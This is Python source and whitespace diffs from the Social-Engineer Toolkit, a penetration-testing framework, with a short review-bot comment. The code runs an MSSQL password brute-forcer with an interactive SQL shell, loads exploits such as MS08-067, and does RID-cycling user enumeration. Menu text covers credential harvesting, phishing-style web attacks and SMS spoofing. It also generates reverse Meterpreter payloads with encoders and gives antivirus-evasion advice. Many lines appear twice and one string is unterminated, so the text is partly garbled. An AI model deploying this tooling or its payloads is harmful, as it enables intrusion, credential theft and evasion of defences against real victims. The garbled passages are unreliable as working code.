if attack_vector_sql == "2":
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
if sql_port == "": sql_port = "1433"
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "": sql_username = "sa"
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
counter = 1
except Exception, e:
print e
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status("Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status("Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print "\n"
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print data
except Exception, e:
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
##################################
##################################
# exploits menu
##################################
##################################
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
##################################
##################################
# exploits menu
##################################
##################################
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
# ms08067
if range == "1":
try: reload(src.fasttrack.exploits.ms08067)
except: import src.fasttrack.exploits.ms08067
# ms08067
if range == "1":
try: reload(src.fasttrack.exploits.ms08067)
except: import src.fasttrack.exploits.ms08067
# firefox 3.6.16
if range == "2":
try: reload(src.fasttrack.exploits.firefox_3_6_16)
except: import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try: reload(src.fasttrack.exploits.solarwinds)
except: import src.fasttrack.exploits.solarwinds
# firefox 3.6.16
if range == "2":
try: reload(src.fasttrack.exploits.firefox_3_6_16)
except: import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try: reload(src.fasttrack.exploits.solarwinds)
except: import src.fasttrack.exploits.solarwinds
# rdp DoS
if range == "4":
try: reload(src.fasttrack.exploits.rdpdos)
except: import src.fasttrack.exploits.rdpdos
# rdp DoS
if range == "4":
try: reload(src.fasttrack.exploits.rdpdos)
except: import src.fasttrack.exploits.rdpdos
if range == "5":
try: reload(src.fasttrack.exploits.mysql_bypass)
except: import src.fasttrack.exploits.mysql_bypass
if range == "5":
try: reload(src.fasttrack.exploits.mysql_bypass)
except: import src.fasttrack.exploits.mysql_bypass
if range == "6":
try: reload(src.fasttrack.exploits.f5)
except: import src.fasttrack.exploits.f5
if range == "6":
try: reload(src.fasttrack.exploits.f5)
except: import src.fasttrack.exploits.f5
##################################
##################################
# sccm attack menu
##################################
##################################
if attack_vector == "3":
# load sccm attack
try: reload(src.fasttrack.sccm.sccm_main)
except: import src.fasttrack.sccm.sccm_main
##################################
##################################
# sccm attack menu
##################################
##################################
if attack_vector == "3":
# load sccm attack
try: reload(src.fasttrack.sccm.sccm_main)
except: import src.fasttrack.sccm.sccm_main
##################################
##################################
# dell drac default credential checker
##################################
##################################
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
##################################
##################################
# dell drac default credential checker
##################################
##################################
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
##################################
##################################
# RID ENUM USER ENUMERATION
##################################
##################################
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
##################################
##################################
# RID ENUM USER ENUMERATION
##################################
##################################
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
|______|
""")
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
print "\n"
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
break
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
filewrite = file("src/program_junk/dictionary.txt", "w")
filewrite.write("\nPassword1")
# specify the path
dict = "src/program_junk/dictionary.txt"
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
print "\n"
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
break
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
filewrite = file("src/program_junk/dictionary.txt", "w")
filewrite.write("\nPassword1")
# specify the path
dict = "src/program_junk/dictionary.txt"
# if we are not brute forcing
if dict.lower() == "no":
print_status("No problem, not brute forcing user accounts")
dict = ""
# if we are not brute forcing
if dict.lower() == "no":
print_status("No problem, not brute forcing user accounts")
dict = ""
if dict != "":
print_warning("You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status("Okay. Not brute forcing user accounts *phew*.")
dict = ""
if dict != "":
print_warning("You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status("Okay. Not brute forcing user accounts *phew*.")
dict = ""
# next we see what rid we want to start
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "": start_rid = "500"
# stop rid
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "": stop_rid = "15000"
print_status("Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
# next we see what rid we want to start
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "": start_rid = "500"
# stop rid
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "": stop_rid = "15000"
print_status("Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
# once we are finished, prompt.
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.)
# once we are finished, prompt.
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.)
# handle keyboard exceptions
except KeyboardInterrupt:
pass
except KeyboardInterrupt:
pass


@ -1,8 +1,8 @@
#!/usr/bin/env python
try:
import readline
import readline
except:
pass
pass
from src.core.setcore import bcolors, get_version, check_os, meta_path
# grab version of SET
@ -68,16 +68,16 @@ webattack_menu = ['Java Applet Attack Method',
fasttrack_menu = ['Microsoft SQL Bruter',
'Custom Exploits',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
'0D']
fasttrack_text = ("""
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
have a series of exploits and automation aspects to assist in the art of penetration testing. SET
now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
completely rewritten and customized from scratch as to improve functionality and capabilities.
now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
completely rewritten and customized from scratch as to improve functionality and capabilities.
""")
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
@ -89,7 +89,7 @@ fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
'0D']
fasttrack_exploits_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
menu has obscure exploits and ones that are primarily python driven. This will continue to grow over time.
""")
@ -100,7 +100,7 @@ fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
fasttrack_mssql_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
attack vector will attempt to identify live MSSQL servers and brute force the weak account passwords that
may be found. If that occurs, SET will then compromise the affected system by deploying a binary to
may be found. If that occurs, SET will then compromise the affected system by deploying a binary to
hexadecimal attack vector which will take a raw binary, convert it to hexadecimal and use a staged approach
in deploying the hexadecimal form of the binary onto the underlying system. At this point, a trigger will occur
to convert the payload back to a binary for us.
@ -110,7 +110,7 @@ webattack_text = ("""
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The """ + bcolors.BOLD + """Java Applet Attack""" + bcolors.ENDC + """ method will spoof a Java Certificate and deliver a
The """ + bcolors.BOLD + """Java Applet Attack""" + bcolors.ENDC + """ method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
@ -118,21 +118,21 @@ webattack_text = ("""
browser exploits through an iframe and deliver a Metasploit payload.
The """ + bcolors.BOLD + """Credential Harvester""" + bcolors.ENDC + """ method will utilize web cloning of a web-
site that has a username and password field and harvest all the
site that has a username and password field and harvest all the
information posted to the website.
The """ + bcolors.BOLD + """TabNabbing""" + bcolors.ENDC + """ method will wait for a user to move to a different
tab, then refresh the page to something different.
The """ + bcolors.BOLD + """Man Left in the Middle Attack""" + bcolors.ENDC + """ method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
The """ + bcolors.BOLD + """Man Left in the Middle Attack""" + bcolors.ENDC + """ method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
@ -143,12 +143,12 @@ webattack_text = ("""
""")
webattack_vectors_menu = ['Web Templates',
'Site Cloner',
'Site Cloner',
'Custom Import\n',
]
webattack_vectors_text = ("""
The first method will allow SET to import a list of pre-defined web
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
@ -172,7 +172,7 @@ teensy_menu = ['Powershell HTTP GET MSF Payload',
'X10 Arduino Sniffer PDE and Libraries',
'X10 Arduino Jammer PDE and Libraries',
'Powershell Direct ShellCode Teensy Attack',
'Peensy Multi Attack Dip Switch + SDCard Attack',
'Peensy Multi Attack Dip Switch + SDCard Attack',
'0D']
teensy_text = ("""
@ -189,7 +189,7 @@ teensy_text = ("""
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
@ -205,17 +205,17 @@ teensy_text = ("""
Select a payload to create the pde file to import into Arduino:
""")
sms_attack_menu = ['Perform a SMS Spoofing Attack',
sms_attack_menu = ['Perform a SMS Spoofing Attack',
'Create a Social-Engineering Template',
'0D']
sms_attack_text = ("""
The """ + bcolors.BOLD + """SMS""" + bcolors.ENDC + """ module allows you to specially craft SMS messages and send them
to a person. You can spoof the SMS source.
to a person. You can spoof the SMS source.
This module was created by the team at TB-Security.com.
You can use a predefined template, create your own template or specify
You can use a predefined template, create your own template or specify
an arbitrary message. The main method for this would be to get a user to
click or coax them on a link in their browser and steal credentials or
perform other attack vectors.
@ -231,7 +231,7 @@ wireless_attack_text = """
wireless card and redirect all DNS queries to you. The concept is fairly
simple, SET will create a wireless access point, dhcp server, and spoof
DNS to redirect traffic to the attacker machine. It will then exit out
of that menu with everything running as a child process.
of that menu with everything running as a child process.
You can then launch any SET attack vector you want, for example the Java
Applet attack and when a victim joins your access point and tries going to
@ -241,7 +241,7 @@ wireless_attack_text = """
"""
infectious_menu = ['File-Format Exploits',
infectious_menu = ['File-Format Exploits',
'Standard Metasploit Executable',
'0D']
@ -253,12 +253,12 @@ infectious_text = """
Pick the attack vector you wish to use: fileformat bugs or a straight executable.
"""
# used in create_payloads.py
if operating_system != "windows":
if msf_path != False:
payload_menu_1 = [
payload_menu_1 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
@ -337,7 +337,7 @@ create_payloads_menu = [
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Apple QuickTime PICT PnSize Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Adobe Reader u3D Memory Corruption Vulnerability',
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
@ -398,9 +398,9 @@ powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
'0D']
powershell_text = ("""
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow
you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell
provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow
you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell
provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by
preventative technologies.
""")
@ -424,13 +424,13 @@ encoder_menu = ['avoid_utf8_tolower (Normal)',
encoder_text = """
Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.
"""
dll_hijacker_text = """
The DLL Hijacker vulnerability will allow normal file extenstions to
call local (or remote) .dll files that can then call your payload or
The DLL Hijacker vulnerability will allow normal file extenstions to
call local (or remote) .dll files that can then call your payload or
executable. In this scenario it will compact the attack in a zip file
and when the user opens the file extension, will trigger the dll then
ultimately our payload. During the time of this release, all of these


@ -19,10 +19,10 @@ print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n")
for name in glob.glob("modules/*.py"):
counter = counter + 1
fileopen = file(name, "r")
for line in fileopen:
line = line.rstrip()
match = re.search("MAIN=", line)
@ -32,7 +32,7 @@ for name in glob.glob("modules/*.py"):
line = " " + str(counter) + ". " + line
print line
print "\n 99. Return to the previous menu\n"
print "\n 99. Return to the previous menu\n"
choice = raw_input(setprompt(["9"], ""))
if choice == 'exit':
@ -42,9 +42,9 @@ if choice == '99':
menu_return = "true"
# throw error if not integer
try:
try:
choice = int(choice)
except:
except:
print_warning("An integer was not used try again")
choice = raw_input(setprompt(["9"], ""))
@ -56,7 +56,7 @@ if menu_return == "false":
for name in glob.glob("modules/*.py"):
counter = counter+1
if counter == int(choice):
# get rid of .modules extension
name = name.replace("modules/", "")
@ -66,9 +66,9 @@ if menu_return == "false":
sys.path.append("modules/")
# this will import the third party module
try:
try:
exec("import " + name)
except:
except:
pass
# this will call the main() function inside the python file
@ -76,6 +76,6 @@ if menu_return == "false":
try:
exec("%s.main()" % (name))
# handle the exception if main isn't there
except Exception, e:
except Exception, e:
raw_input(" [!] There was an issue with a module: %s." % (e))
return_continue()


@ -17,7 +17,7 @@ definepath=os.getcwd()
define_version = get_version()
users_home = os.getenv("HOME")
# metasploit path
# metasploit path
meta_path=meta_path()
# define if we need apache or not for dll hijacking
@ -45,7 +45,7 @@ for line in apache_check:
###################################################
# USER INPUT: SHOW PAYLOAD MENU #
###################################################
###################################################
inputpdf=""
target=""
exploit = "INVALID"
@ -69,14 +69,14 @@ while exploit == "INVALID":
if exploit == '3': #'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile=("template.doc")
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
outfile=("template.rtf")
target=("TARGET=1")
if exploit == "5":
outfile = ("template.mov")
if exploit != '3' and exploit != '4' and exploit !="17":
if exploit != '3' and exploit != '4' and exploit !="17":
outfile=("template.pdf")
@ -89,18 +89,18 @@ while exploit == "INVALID":
time.sleep(2)
# 'exploit' has been converted to the string by now, so we need to
# evaluate the string instead of the user input number from here on...
# evaluate the string instead of the user input number from here on...
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print """
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack\n"""
choicepdf = raw_input(setprompt(["4"], ""))
if choicepdf == 'exit':
exit_set()
if choicepdf == '1':
# define if user wants to use their own pdf or built in one
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
@ -129,24 +129,24 @@ if exploit == "dll_hijacking" or exploit == "unc_embed":
exploit_counter=1
if exploit_counter == 0:
###################################################
# USER INPUT: SHOW PAYLOAD MENU 3 #
###################################################
###################################################
debug_msg(me,"printing 'src.core.menu.text.payload_menu_3'",5)
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
payload=raw_input(setprompt(["4"], ""))
noencode=0
if payload == 'exit':
exit_set()
if payload == "" : payload="2"
if payload == "" : payload="2"
if payload == '4' or payload == '5' or payload == '6':
noencode=1
payload=ms_payload_3(payload)
# imported from central, grabs ip address
rhost=grab_ipaddress()
@ -237,17 +237,17 @@ if exploit == "dll_hijacking":
if apache == 0:
if not os.path.isfile("%s/src/program_junk/fileformat.file" % (definepath)):
# try:
filewrite=file("src/program_junk/attack_vector","w")
filewrite.write("hijacking")
filewrite.close()
filewrite=file("src/program_junk/site.template","w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir src/program_junk/web_clone;cp src/html/msf.exe src/program_junk/web_clone/x", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child=pexpect.spawn("python src/html/web_server.py")
filewrite=file("src/program_junk/attack_vector","w")
filewrite.write("hijacking")
filewrite.close()
filewrite=file("src/program_junk/site.template","w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir src/program_junk/web_clone;cp src/html/msf.exe src/program_junk/web_clone/x", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child=pexpect.spawn("python src/html/web_server.py")
# except: child.close()
# if we are using apache
# if we are using apache
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
@ -257,7 +257,7 @@ if exploit == "dll_hijacking":
print_info("This may take a few to load MSF...")
try:
child1=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/meta_config" % (meta_path))
except:
except:
try:
child1.close()
except: pass
@ -271,7 +271,7 @@ if exploit == "dll_hijacking":
except: import smtp_client
try:
child1.interact()
except:
except:
if apache == 0:
try:
child.close()
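Review bot: In the `-237` hunk `apache_path` is interpolated straight into a shell command, `subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()`; a configured path containing spaces or shell metacharacters would break the command or run something other than a copy. A plain `shutil.copyfile("src/html/msf.exe", os.path.join(apache_path, "x.exe"))` avoids the shell entirely, and the `mkdir ...;cp ...` chain a few lines above can likewise become `os.makedirs`/`shutil.copyfile` calls (with the current form a failing `mkdir` is hidden by the stderr pipe and `;` runs the copy regardless). Where `apache_path` is assigned is outside this hunk, so I am assuming it comes from the apache config check near the top of the file. The commented-out `# try:` / `# except: child.close()` remnants around the block could be dropped while touching it.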


@ -40,9 +40,9 @@ linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "
upx_encode = check_config("UPX_ENCODE=")
upx_path = check_config("UPX_PATH=")
if operating_system != "windows":
if not os.path.isfile(upx_path):
print_error("ERROR: UPX packer was not found. Disabling UPX packing.")
upx_encode = "OFF"
if not os.path.isfile(upx_path):
print_error("ERROR: UPX packer was not found. Disabling UPX packing.")
upx_encode = "OFF"
unc_embed = check_config("UNC_EMBED=")
# add the digital signature stealing
@ -111,24 +111,24 @@ if check_options("IPADDR=") == 0:
data = fileopen.read()
match = re.search("AUTO_DETECT=ON", line)
if match:
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr=ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr=ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
except Exception,e:
log(e)
ipaddr=raw_input(setprompt(["4"], "IP address for the payload listener"))
update_options("IPADDR=" + ipaddr)
except Exception,e:
log(e)
ipaddr=raw_input(setprompt(["4"], "IP address for the payload listener"))
update_options("IPADDR=" + ipaddr)
# if AUTO_DETECT=OFF prompt for IP Address
match=re.search("AUTO_DETECT=OFF", data)
if match:
ipaddr=raw_input(setprompt(["4"], "Enter the IP address for the payload (reverse)"))
filewrite.write(ipaddr)
filewrite.close()
ipaddr=raw_input(setprompt(["4"], "Enter the IP address for the payload (reverse)"))
filewrite.write(ipaddr)
filewrite.close()
# payload selection here
try:
@ -141,13 +141,13 @@ try:
encode=""
# this is payload
choice1=""
# this is port
# this is port
choice3=""
if os.path.isfile("src/program_junk/meterpreter_reverse_tcp_exe"):
fileopen=file("src/program_junk/meterpreter_reverse_tcp_exe", "r")
for line in fileopen:
# this reads in the first line of the file which happens to be port
# when calling through core
# this reads in the first line of the file which happens to be port
# when calling through core
choice3=line.rstrip()
# change attack_vector to nothing
attack_vector=""
@ -163,7 +163,7 @@ try:
# USER INPUT: SHOW PAYLOAD MENU 1 #
###################################################
debug_msg(me,"printing 'text.payload_menu_1'",5)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
if operating_system == "windows" or msf_path == False:
@ -186,16 +186,16 @@ try:
if choice1 != "":
choice1 = check_length(choice1,17)
# convert it to a string
choice1 = str(choice1)
choice1 = str(choice1)
custom=0
counter=0
flag=0
encode_stop=0
# Condition testing of 'choice1'
# Will use a dictionary list
if choice1 == "exit":
# Will use a dictionary list
if choice1 == "exit":
exit_set()
if choice1 == '':
@ -232,7 +232,7 @@ try:
if choice1 != "17":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
choice1 = ms_payload_2(choice1)
# don't do courtesy shell
if counter==0:
@ -243,11 +243,11 @@ try:
print_info("Example: /root/custom.exe")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
while 1:
print_error("ERROR:File not found. Try Again.")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1):
break
while 1:
print_error("ERROR:File not found. Try Again.")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1):
break
update_options("CUSTOM_EXE=%s" % (choice1))
custom=1
@ -256,7 +256,7 @@ try:
check_write=file("src/program_junk/custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", "%s/src/program_junk/msf.exe" % (definepath))
# Specify Encoding Option
@ -280,9 +280,9 @@ try:
if encode_stop == 0 and encode != "16" and choice1 != "set/reverse_shell":
###################################################
# USER INPUT: SHOW ENCODER MENU #
###################################################
###################################################
debug_msg (me,"printing 'text.encoder_menu'",5)
show_encoder_menu = create_menu(encoder_text, encoder_menu)
show_encoder_menu = create_menu(encoder_text, encoder_menu)
encode = raw_input(setprompt(["18"], ""))
encoder="true"
@ -296,23 +296,23 @@ try:
encode = "2"
encoder = "true"
# Handle special cases
# Handle special cases
if encode=='' or encode == ' ': encode = '16'
if encode == '16': encount=0
if encode=='14' or encode == '0': encoder="false"
# do dictionary lookup
# do dictionary lookup
encode1 = encoder_type(encode)
encode = "x86/" + encode1
if encode == "x86/MULTIENCODE" or encode == "x86/BACKDOOR":
encode = encode.replace("x86/", "")
# Specify Remote Host if ipaddr.file is missing (should never get here)
if check_options("IPADDR=") == 0:
if check_options("IPADDR=") == 0:
choice2=raw_input(setprompt(["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
update_options("IPADDR=" + choice2)
update_options("IPADDR=" + choice2)
choice2 = check_options("IPADDR=")
choice2 = check_options("IPADDR=")
# grab interface ip address
if os.path.isfile("src/program_junk/interface"):
@ -323,11 +323,11 @@ try:
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
if choice1 != "shellcode/multipyinject":
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
if choice3 == '': choice3 = '443'
# this is needed for the set_payload
update_options("PORT=" + choice3)
update_options("PORT=" + choice3)
# if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell":
@ -361,159 +361,159 @@ try:
if choice1 != "set/reverse_shell":
# if we aren't using shellcodeexec
if choice1 != "shellcode/alphanum":
if choice1 != "shellcode/pyinject":
if choice1 != "shellcode/multipyinject":
generatepayload=subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s %s %s %s > %s/src/program_junk/%s" % (path,choice1,choice2,portnum,courtesyshell,choice4,definepath,msf_filename), shell=True).wait()
if choice1 != "shellcode/pyinject":
if choice1 != "shellcode/multipyinject":
generatepayload=subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s %s %s %s > %s/src/program_junk/%s" % (path,choice1,choice2,portnum,courtesyshell,choice4,definepath,msf_filename), shell=True).wait()
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/src/program_junk/meterpreter.raw" % (path,choice9,choice2,portnum,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("ruby %s/msfencode -e x86/alpha_mixed -i %s/src/program_junk/meterpreter.raw -t raw BufferRegister=EAX > %s/src/program_junk/meterpreter.alpha_decoded" % (path,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
